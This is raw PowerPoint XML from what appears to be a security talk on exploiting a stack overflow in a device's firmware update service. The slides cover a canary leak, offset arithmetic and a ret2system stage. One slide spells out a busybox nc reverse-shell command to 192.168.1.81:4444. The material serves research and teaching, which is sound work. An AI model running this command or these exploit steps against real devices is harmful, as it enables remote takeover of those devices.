              <a:t>leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Stage 2 : return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>to system("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>mknod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> /data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>backpipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> p &amp;&amp; /system/bin/sh 0&lt;/data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>backpipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>busybox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> 192.168.1.81 4444 1&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>backpipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>") =&gt; reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> ;)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702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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> frame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589332"/>
            <a:ext cx="6984776" cy="2351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8248" y="376044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328248" y="344380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328248" y="280330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R7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328248" y="3127176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R6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28248" y="2479424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R8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328248" y="215554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R9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328248" y="1843132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R10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328248" y="152650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R11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328248" y="121496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328248" y="4077072"/>
            <a:ext cx="2232248" cy="196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0x904</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj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248128" y="6039504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35360" y="494116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35360" y="3115740"/>
            <a:ext cx="3384376" cy="4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72696" y="5854838"/>
            <a:ext cx="20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0560496" y="4077072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1098956" y="3892406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28248" y="777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256240" y="60977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812524" y="4294838"/>
            <a:ext cx="11267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-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fomit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-frame-pointer </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9933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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> frame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328248" y="376044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328248" y="344380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328248" y="280330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R7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328248" y="3127176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R6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28248" y="2479424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R8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328248" y="215554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R9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328248" y="1843132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R10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328248" y="152650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R11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328248" y="121496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328248" y="4077072"/>
            <a:ext cx="2232248" cy="196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248128" y="6039504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303912" y="5854838"/>
            <a:ext cx="214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7" y="3200083"/>
            <a:ext cx="7593841" cy="1194969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>
            <a:off x="335360" y="3501008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94347" y="4395052"/>
            <a:ext cx="4317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28248" y="4467627"/>
            <a:ext cx="2232248" cy="3166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Canary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453076" y="4784259"/>
            <a:ext cx="875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812461" y="4592903"/>
            <a:ext cx="8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X-8</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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10560496" y="4077072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1098956" y="3892406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328248" y="777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8256240" y="60977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5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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> frame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328248" y="376044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328248" y="344380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328248" y="280330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R7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328248" y="3127176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R6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28248" y="2479424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R8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328248" y="215554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R9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328248" y="1843132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R10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328248" y="1526500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R11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328248" y="1214968"/>
            <a:ext cx="2232248" cy="3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328248" y="4077072"/>
            <a:ext cx="2232248" cy="196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248128" y="6039504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28248" y="4467627"/>
            <a:ext cx="2232248" cy="3166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Canary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453076" y="4784259"/>
            <a:ext cx="875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" y="1744560"/>
            <a:ext cx="7932772" cy="2846109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H="1">
            <a:off x="10560496" y="4077072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1098956" y="3892406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12461" y="4592903"/>
            <a:ext cx="8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X-8</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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191344" y="2852936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15880" y="5485506"/>
            <a:ext cx="23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Buffer = X-0x808</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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7248128" y="5661248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303912" y="5854838"/>
            <a:ext cx="214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328248" y="777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8256240" y="60977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1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9336360" y="2711131"/>
            <a:ext cx="0" cy="320049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371360" y="3990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0x800</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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0152" y="3053763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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>HeadLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> = 0x800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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nModules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>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MD5 = ________________ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>5F5F5F5F5F5F5F5F5F5F5F5F5F5F5F5F)</a:t>
            </a:r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16080" y="2060848"/>
            <a:ext cx="2232248" cy="422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735960" y="6289878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16080" y="2394499"/>
            <a:ext cx="2232248" cy="3166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Canary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj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940908" y="2711131"/>
            <a:ext cx="875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9048328" y="2060848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319145" y="2528035"/>
            <a:ext cx="8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X-8</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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03712" y="5735880"/>
            <a:ext cx="23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Buffer = X-0x808</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="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735960" y="5911622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791744" y="6105212"/>
            <a:ext cx="214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662119" y="1905115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6080" y="836712"/>
            <a:ext cx="2232248" cy="122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Saved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registers</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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23425" y="5426421"/>
            <a:ext cx="2224903" cy="4852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Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Header</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2880" y="4617484"/>
            <a:ext cx="2235448" cy="808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</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2880" y="2711131"/>
            <a:ext cx="2235448" cy="1905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Garbage</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2880" y="2708920"/>
            <a:ext cx="6512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CRC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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12880" y="4249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819280" y="62898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4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E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getFirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> id 0x1,len 1 ,md5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E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>somethind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> wrong with the packet !!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fr-FR" dirty="0" smtClean="0"/>
              <a:t>Stage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2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E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getFirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> id 0x1,len 1 ,md5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E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>somethind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> wrong with the packet !!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fr-FR" dirty="0" smtClean="0"/>
              <a:t>Stage 1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836712"/>
            <a:ext cx="4762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Debugging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4851" r="7476" b="5900"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317556" y="1706258"/>
            <a:ext cx="5904656" cy="34142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 b="9051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="191344" y="1911064"/>
            <a:ext cx="4727848" cy="268264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3287688" y="3567248"/>
            <a:ext cx="432048" cy="139226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207568" y="3567249"/>
            <a:ext cx="674612" cy="139226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95500" y="495951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MicroSD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58580" y="493584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MicroUSB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91344" y="5729924"/>
            <a:ext cx="1200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shell@gl300e:/ $ id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=2000(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=2000(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>)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1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1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9336360" y="2711131"/>
            <a:ext cx="0" cy="320049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371360" y="3990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0x800</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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1423" y="3084579"/>
            <a:ext cx="5397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HeadLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> = 0x800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nModules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> = 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Module38.MD5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>________________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12880" y="2059941"/>
            <a:ext cx="2235448" cy="422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735960" y="6289878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12879" y="2394499"/>
            <a:ext cx="2235449" cy="3166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Canary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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40908" y="2711131"/>
            <a:ext cx="875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9048328" y="2060848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319145" y="2528035"/>
            <a:ext cx="8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X-8</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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3712" y="5735880"/>
            <a:ext cx="23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Buffer = X-0x808</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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735960" y="5911622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91744" y="6105212"/>
            <a:ext cx="214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662119" y="1905115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2879" y="836712"/>
            <a:ext cx="2235449" cy="122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Saved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registers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R4 – R11, PC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2881" y="5426421"/>
            <a:ext cx="2235448" cy="4852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Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Header</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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12880" y="4933662"/>
            <a:ext cx="2235448" cy="49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 1</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2880" y="2717800"/>
            <a:ext cx="651272" cy="37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CRC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2880" y="4440903"/>
            <a:ext cx="2235448" cy="49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 2</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2880" y="3937234"/>
            <a:ext cx="2235448" cy="503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812880" y="3474103"/>
            <a:ext cx="2235448" cy="4589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 37 </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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6184" y="2711131"/>
            <a:ext cx="1572143" cy="3960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Garbage</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2880" y="3095848"/>
            <a:ext cx="2235448" cy="3740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 38</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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12880" y="4249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819280" y="62898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2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fr-FR" dirty="0" smtClean="0"/>
              <a:t>Stage 1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87388" y="1916832"/>
            <a:ext cx="11017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ØÈõa&amp;îÇ4§╚VN\gªØÈõa&amp;îÇ4§╚VN\gª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dji_version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hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 0, 0 0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ØÈõa&amp;îÇ4§╚VN\gªØÈõa&amp;îÇ4§╚VN\gª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dji_version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hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 0, 0 0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__________________________________</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>leakXoî</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>®]z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> : 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8c a9 5d 7a 0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  158): ±­</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ÂðO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>╚©¶╠ºÁ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>f1 f0 b6 d0 4f c8 b8 f4 cc a7 b5 01 20 0a </a:t>
            </a:r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somethind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wrong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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt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9362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1.5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8302530" y="3845624"/>
            <a:ext cx="1866" cy="221787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363248" y="463543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0x800</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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132" y="2451113"/>
            <a:ext cx="2243083" cy="399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727848" y="6441751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7628" y="3476291"/>
            <a:ext cx="2239387" cy="3348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0x8ca95d7a</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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932796" y="3811138"/>
            <a:ext cx="875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040216" y="3160855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311033" y="3628042"/>
            <a:ext cx="8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X-8</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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95600" y="5887753"/>
            <a:ext cx="23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Buffer = X-0x808</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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727848" y="6063495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783632" y="6257085"/>
            <a:ext cx="214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54007" y="3005122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7630" y="1155044"/>
            <a:ext cx="2239386" cy="930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Saved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registers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R7 – R11, LR</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7629" y="5578294"/>
            <a:ext cx="2242588" cy="4852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Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Header</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7628" y="5085535"/>
            <a:ext cx="2242588" cy="49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 1</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7629" y="2093310"/>
            <a:ext cx="1090459" cy="369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CRC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7628" y="4581968"/>
            <a:ext cx="2242588" cy="503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797628" y="3811138"/>
            <a:ext cx="2239387" cy="3960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Garbage</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7628" y="4195855"/>
            <a:ext cx="2242588" cy="3740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Module header 38</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7628" y="3147463"/>
            <a:ext cx="2239388" cy="328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0xb6f0f1a0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7628" y="2798074"/>
            <a:ext cx="223938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0xb8c84fd0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7628" y="2456408"/>
            <a:ext cx="223938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0xb5a7ccf4</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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94960" y="2085855"/>
            <a:ext cx="1143604" cy="3652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CC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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8052367" y="3628042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654006" y="3476291"/>
            <a:ext cx="11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j-lt"/>
              </a:rPr>
              <a:t>Canary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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57781" y="27917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R4</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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657781" y="2428938"/>
            <a:ext cx="4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R5</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Connecteur droit avec flèche 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5161837" y="2974911"/>
            <a:ext cx="623144" cy="1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32" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5136491" y="2613604"/>
            <a:ext cx="661137" cy="19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783286" y="64384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memory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797629" y="76993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memory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7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1.5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9376" y="1600200"/>
            <a:ext cx="11233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ØÈõa&amp;îÇ4§╚VN\gªØÈõa&amp;îÇ4§╚VN\gª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dji_version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hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 0, 0 0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ØÈõa&amp;îÇ4§╚VN\gªØÈõa&amp;îÇ4§╚VN\gª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dji_version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hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 0, 0 0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____________________________________</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>leakî</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>®]z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> : 5d 7a 0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  158): ±­</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ÂðO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>╚©¶╠ºÁCCÒÈ═ÛÂ╠R╚©B█­Â}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uµÂð</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>═ºÁ=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>q­Â</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>f1 f0 b6 d0 4f c8 b8 f4 cc a7 b5 43 43 19 e3 d4 cd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ea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b6 cc 52 c8 b8 42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db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f0 b6 7d 75 e6 b6 d0 cd a7 b5 3d 71 f0 b6 20 0a </a:t>
            </a:r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somethind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wrong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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt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0473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2 : ret2system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969140"/>
            <a:ext cx="5690587" cy="2664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0016" y="2636912"/>
            <a:ext cx="5690587" cy="448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91944" y="2725142"/>
            <a:ext cx="648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15880" y="23511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0x75C8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348" y="4264104"/>
            <a:ext cx="40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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> : 0xB13C</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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980470"/>
            <a:ext cx="5011638" cy="828010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connecteur en angle 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="975004" y="3114872"/>
            <a:ext cx="869629" cy="1428836"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26196"/>
              <a:gd name="adj2" fmla="val 12993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86759" y="5384401"/>
            <a:ext cx="86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Offset = 0xB13C – 0x75C8 = 0x3B74 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> – 0x3B74 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> r0,r7; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>blx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> system ;)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6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2 : ret2system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98911" y="6285975"/>
            <a:ext cx="2240246" cy="38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423592" y="6668617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02257" y="5496930"/>
            <a:ext cx="2236901" cy="332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0x8ca95d7a</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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628540" y="5834937"/>
            <a:ext cx="875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739158" y="5165490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12823" y="5627764"/>
